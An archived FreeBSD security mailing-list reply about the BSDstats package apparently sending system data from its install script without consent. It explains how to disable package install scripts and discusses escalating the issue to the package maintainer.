Date: Wed, 7 Apr 2021 20:37:23 -0700 From: Gordon Tetlow <gordon@tetlows.org> To: Stefan Blachmann <sblachmann@gmail.com> Cc: Shawn Webb <shawn.webb@hardenedbsd.org>, Miroslav Lachman <000.fbsd@quip.cz>, FreeBSD Security Team <secteam@freebsd.org>, Ed Maste <emaste@freebsd.org>, FreeBSD-security@freebsd.org, cperciva@freebsd.org Subject: Re: Security leak: Public disclosure of user data without their consent by installing software via pkg Message-ID: <DE5BE925-0F4F-4312-9788-20E19BA2CD47@tetlows.org> In-Reply-To: <CACc-My2PMzaiwqZUnTEhzKY5U3n0GzjOXMmsgPEVjf5Zyn4F4w@mail.gmail.com> References: <CACc-My1b32PLyeOU4hMDCBGaVzU1GLSrgAft95zMb5U7p7eRwQ@mail.gmail.com> <20210406142735.nbearpqiqz3wyrmd@mutt-hbsd> <6fcb2d1a-929e-c1fe-0273-42858ec547ec@quip.cz> <20210406144222.gbgjcc7jsozsl2m2@mutt-hbsd> <410E4486-F9CF-41C3-9396-BD307AF2325F@tetlows.org> <CACc-My2PMzaiwqZUnTEhzKY5U3n0GzjOXMmsgPEVjf5Zyn4F4w@mail.gmail.com>
next in thread | previous in thread | raw e-mail | index | archive | help
> On Apr 7, 2021, at 7:50 PM, Stefan Blachmann <sblachmann@gmail.com> =
wrote:
>=20
<snip>
> Anything else is apparently deemed =E2=80=9Callowed=E2=80=9D.
> Spying out the machine and its configuration, sending that data to an
> external entity =E2=80=93 perfectly OK. Not a problem at all.
>=20
> This has been proved by the handling of this last BSDstats security
> incident, where the FreeBSD =E2=80=9Cpkg=E2=80=9D utility is being =
abused to run
> spyware without the users=E2=80=99 pre-knowledge and without his =
content.
>=20
> This abuse is apparently being considered acceptable by both FreeBSD
> and HardenedBSD security officers.
> Instead of taking action, you "security officers" tell the FreeBSD
> users that it is their own guilt that they got =E2=80=9Cpwnd=E2=80=9D.
> Just because they trustingly installed software from the package repo
> hosted by FreeBSD, without religiously-carefully auditing every and
> each packages' pre- and postinstallation script before actual install,
> using the =E2=80=9Cpkg -I=E2=80=9D option.
I do not consider it acceptable that this behavior is occurring. I'll =
quote to you what I said in my private email to you:
Running scripts at pre/post-install is a foundational design of =
packages. These scripts can do anything a shell script can do. If you =
are concerned packages running scripts, I recommend changing the pkg =
setting:
RUN_SCRIPTS: boolean
Run pre-/post-installation action scripts. Default: =
YES.
Change this in your /usr/local/etc/pkg.conf and you will not have =
pre/post install scripts running for your packages.
Another option, instead of changing the global default is to use the pkg =
install -I switch, which will not run scripts for that installation.
As for the behavior of this specific package, I agree it is poor that it =
runs without user consent. Reading the pkg-install script, it appears it =
should ask consent, perhaps it is broken. I recommend taking it up with =
the port/package maintainer, scrappy@hub.org <mailto:scrappy@hub.org>, =
whom I have added to this email.
I agree this should be fixed and is undesirable. Even the pkg maintainer =
who is the person running the bsdstats website is in agreement here. The =
difference is: I don't assume the maintainer has ill-will and it is the =
result of an oversight that will be fixed. There is a process to be =
followed and I am not comfortable wielding the security-officer hammer =
unless I see visible evidence the process is broken and requires me to =
intercede. We aren't there.
<snip>
> Can it be ethically acceptable to put users at risk, for example by
> intentionally (?) not setting any limits to what extent installer
> scripts are allowed to collect sensitive user and system data and
> disclose them to interested third parties?
This is an interesting point. Unfortunately, the technology we have =
gives unfettered access to the system. I'm having a hard time thinking =
how we could achieve the goal of installing software (which in our model =
requires root privileges) while also limiting what it is allowed to do =
on said system. I'm not aware of any other package system (rpm, deb, =
etc) that has technical limits on pre/post installation scripts. If you =
are aware of any examples, I'd love to see it to see if there is =
something we can incorporate. Patches, as always, are welcome to improve =
the system.
> This should imho be discussed in public, leading to the formulation of
> rules which might help enabling users to trust FreeBSD.
>=20
> [ Just to note: the porter of the package in question wrote me that it
> never was the intention to run the scripts without user content. There
> must have happened something/some action by someone, which led to this
> behaviour. What actually happened, this can be analyzed.
> For me, what actually matters is not this particular incident, but the
> finding that spyware behavior of pre/postinstaller scripts is
> apparently generally deemed acceptable and not actionable, according
> to FreeBSD rules. So the problem are these rules, and not this last
> incident. ]
I disagree with your premise. For the record, I did take action, which =
was to escalate the problem to the port/pkg maintainer. It is their =
software and their responsibility. Please do not take my unwillingness =
to violate the maintainer's ownership of their port/pkg as unwillingness =
to deal with the issue. I'm would like the process to have a chance to =
work.
Lastly, your combative tone in reporting this issue is far from anything =
I would consider professional. I would ask that you give some =
consideration to your words in the hopes that you will understand that =
flaming me on the mailing list is unlikely to make me want to advocate =
for you.
Thanks,
Gordon=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?DE5BE925-0F4F-4312-9788-20E19BA2CD47>